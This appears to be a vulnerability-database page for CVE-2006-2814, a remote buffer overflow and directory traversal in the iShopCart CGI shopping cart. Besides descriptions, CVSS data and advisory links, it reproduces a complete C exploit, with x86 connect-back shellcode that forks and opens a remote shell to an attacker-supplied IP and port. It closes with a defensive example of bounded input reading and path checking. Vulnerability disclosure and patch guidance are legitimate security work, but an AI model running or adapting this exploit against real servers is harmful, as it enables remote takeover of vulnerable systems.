CVE-2006-2814
CVSS7.5
Published: 2006-06-05 13:02:00
Revised: 2011-03-07 21:37:04

[Original text] Multiple buffer overflows in the (1) vGetPost and (2) main functions in easy-scart.c through easy-scart6.c in iShopCart allow remote attackers to execute arbitrary code by sending a large amount of data containing "Submit" in an sslinvoice action, and allow remote attackers to have an unknown impact via a large amount of posted data.


[CNNVD] iShopCart multiple remote security vulnerabilities (CNNVD-200606-093)

        iShopCart is a web-based e-commerce application.
        iShopCart contains multiple security vulnerabilities in its handling of malformed user requests; a remote attacker could exploit them to perform directory traversal or to execute arbitrary commands with the privileges of the server process.
        The easy-scart.cgi script of iShopCart does not properly filter user parameter data, so an attacker can insert "../" sequences to cause directory traversal. The main() and vGetPost() functions of iShopCart each contain a fixed-length buffer that can be overflowed; a remote attacker can trigger execution of malicious code by supplying overlong parameter data.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2814
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2814
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-093
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2108
(UNKNOWN)  VUPEN  ADV-2006-2108
http://www.securityfocus.com/bid/18222
(UNKNOWN)  BID  18222
http://www.securityfocus.com/archive/1/archive/1/435597/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060531 ishopcart cgi 0day and multiple vulnerabilities
http://xforce.iss.net/xforce/xfdb/27014
(UNKNOWN)  XF  ishopcart-easyscart-bo(27014)
http://securityreason.com/securityalert/1031
(UNKNOWN)  SREASON  1031
http://secunia.com/advisories/20415
(UNKNOWN)  SECUNIA  20415

- Vulnerability information

iShopCart multiple remote security vulnerabilities
High risk  Buffer overflow
2006-06-05 00:00:00 2006-06-05 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (1862)

iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi) (EDBID:1862)
cgi webapps
2006-06-02 Verified
0 K-sPecial
N/A
/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: ishopcart-cgi-bof.c (<= easy-scart6.c)
 * Date: 5/25/2006
 * Version:
 *  1.00 (5/25/2006) - ishopcart-cgi-bof.c created
 *
 * Description: there is an overflow in the vGetPost() function, it does not do any size checking on the inputed data but instead
 *  reads until the word "Submit" is encountered, in turn overflowing pszBuf which points to a 4000 byte buffer in main(). Complete
 *  code execution is spawned, with the code being a connectback shell.
 *
 * Notes: I could not for the life of me find any connect back shellcode that forks! This code needed to fork because apache
 *  was killing the connect back process as soon as it connected. So, in turn, I have modified netric's callback shellcode with
 *  some forking shellcode to accomplish the workaround.
 *
 * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <getopt.h>
#include <errno.h>
#include <stdlib.h>

#define PORT 		80
#define CB_PORT		31337
#define IP_OFFSET       33 + 13
#define PORT_OFFSET     39 + 13    // + 13 to these for the new forking mod added to cb[]
#define OFFSET		0x41414141 // find your own damn offset, the code works 100% any fault is on yourself

void changeip(char *ip);
void changeport(char *code, int port, int offset);
void help(void);

// netric callback shellcode
char cb[] =
        "\x31\xc0\x31\xdb" 

        "\xb0\x02"                      // movb         $0x2,%al        / sys_fork (2)
        "\xcd\x80"                      // int          $0x80
        "\x38\xc3"                      // cmpl         %ebx,%eax       / check if child; %eax = 0x0
        "\x74\x05"                      // je           0x5             / jump after the exit if we're the child
        // sys_exit (1)
        "\x8d\x43\x01"                  // leal         0x1(%ebx),%eax  / sys_exit (1) if we're the parent
        "\xcd\x80"                      // int          $0x80           / interrupt 80 to execute sys_exit
	
	"\x31\xc9\x51\xb1"
        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
        "\x68\x41\x42\x43\x44\x66\x68\xb0"
        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
        "\x01\xcd\x80";

int main (int argc, char **argv) {
	int sock;
	unsigned offset = OFFSET, ipaddr, i = 0;
	unsigned short port = PORT, cbport = CB_PORT;
	struct sockaddr_in server;
	char *host, *location, *cbip, buff[5120], opt;

	host = location = cbip = 0;
	
	while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) {
		switch(opt) { 
			case 'i':
				host = optarg;
				break;
			case 'p':
				sscanf(optarg, "%hu", &port);
				break;
			case 'o':
				sscanf(optarg, "%x", &offset);
				break;
			case 'l':
				location = optarg;
				break;
			case '1':
				cbip = optarg;
				break;
			case '2':
				sscanf(optarg, "%hu", &cbport);
				break;
		}
	}

	if (!(host && location && cbip)) { 
		puts("-!> a required argument was missing\n");
		help();
		exit(1);
	}

        changeip(cbip);
	changeport(cb, cbport, PORT_OFFSET);
	
	if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		printf("socket() error: %s\n", strerror(errno));
		exit(1);
	}
	server.sin_port = htons(port);	

        if ((ipaddr = inet_addr(host)) == -1) {
		struct hostent *myhost;
		if ((myhost = gethostbyname(host)) == 0) {
			printf("-!> failed to resolve host '%s'\n", host);
			exit(1);
		}
		memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length);
	}
	else server.sin_addr.s_addr = ipaddr;

	server.sin_family = AF_INET;
	memset(&(server.sin_zero), 0, 8);

        if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) {
	        printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno));
		exit(1);
	}
	sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"));
	send(sock, buff, strlen(buff), 0);

	for (0; i < 4000; i++) *(buff+i) = 0x90;
	for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++)  *(buff+i) = *(cb+a);
	for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4);
	
	strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n");

	
	send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0);
}

void help (void) { 
	char *string = "ishopcart CGI shopcart buffer overflow exploit by K-sPecial (http://xzziroz.net) of .aware (http://awarenetwork.org)\nLicense: GPL (5/24/2006)\n\n"
		       "-i <%s>  \t - specifies the vulnerable host; default 80\n"
		       "-p [%hu] \t - specifies the vulnerable host's port\n"
		       "-l <%s>  \t - specifies the vulnerable CGI location\n"
		       "-o [%x]  \t - forces an explicit offset\n"
		       "-1 <%s>  \t - specifies the connect back ip\n"
		       "-2 [%hu] \t - specifies the connect back port; default 31337\n"
		       "-h	 \t - shows this help\n";

	puts(string);
}		       

void changeip(char *ip) {
        char *ptr;
        ptr=cb+IP_OFFSET;
        /* Assume Little-Endianess.... */
        *((long *)ptr)=inet_addr(ip);
}

// ripped from some of snooq's code
void changeport(char *code, int port, int offset) {
        char *ptr;
        ptr=code+offset;
        /* Assume Little-Endianess.... */
        *ptr++=(char)((port>>8)&0xff);
        *ptr++=(char)(port&0xff);
}

// milw0rm.com [2006-06-02]
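The CNNVD description and the exploit header above describe the same two defects: vGetPost() copies POST data until the word "Submit" appears without checking against the 4000-byte buffer in main(), and easy-scart.cgi passes "../" sequences in parameters through unfiltered. The following is an added example, not iShopCart's code or the exploit author's, showing the bounded read and the file-name check a fix would need; the function names and POST_BUF_SIZE are assumptions, and the sample bodies are constructed.

```c
#include <stdio.h>
#include <string.h>

#define POST_BUF_SIZE 4000   /* the 4000-byte buffer size the advisory describes */
#define STOP_WORD "Submit"

/* Copy POST-body bytes into out (capacity cap) until STOP_WORD is found.
 * Returns the number of bytes stored, or -1 if STOP_WORD never appears or
 * would only appear after the buffer is full: an oversized body is refused
 * instead of being written past the end of out. (Assumed name.) */
int read_post_until_submit(const char *body, size_t len, char *out, size_t cap) {
    size_t stop_len = strlen(STOP_WORD), n = 0;
    if (cap == 0) return -1;
    while (n + stop_len <= len) {              /* enough bytes left to hold the stop word? */
        if (memcmp(body + n, STOP_WORD, stop_len) == 0) {
            out[n] = '\0';                     /* stop word reached within bounds */
            return (int)n;
        }
        if (n + 1 >= cap) return -1;           /* no room for this byte plus the terminator */
        out[n] = body[n];
        n++;
    }
    return -1;                                 /* body ended without the stop word */
}

/* Reject a user-supplied file name carrying a path separator or a ".."
 * component, the "../" traversal pattern the advisory describes. (Assumed name.) */
int is_safe_filename(const char *name) {
    if (name == NULL || *name == '\0') return 0;
    if (strchr(name, '/') || strchr(name, '\\')) return 0;
    return strstr(name, "..") == NULL;
}

static char g_out[POST_BUF_SIZE];              /* destination used by the demos */

/* Constructed sample: a well-formed body terminated by the stop word. */
int demo_normal(void) {
    const char *body = "item=42&qty=1Submit";
    return read_post_until_submit(body, strlen(body), g_out, sizeof g_out);
}

/* Constructed sample: 4194 filler bytes then the stop word, longer than the buffer. */
int demo_oversized(void) {
    static char body[4200];
    memset(body, 'A', sizeof body - 6);
    memcpy(body + sizeof body - 6, STOP_WORD, 6);
    return read_post_until_submit(body, sizeof body, g_out, sizeof g_out);
}
```

demo_normal() returns 13 with g_out holding "item=42&qty=1"; demo_oversized() returns -1 where the original code would have kept writing past the buffer.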
		

- Vulnerability information

25969
iShopCart POST Request vGetPost() Function Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-05-31 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete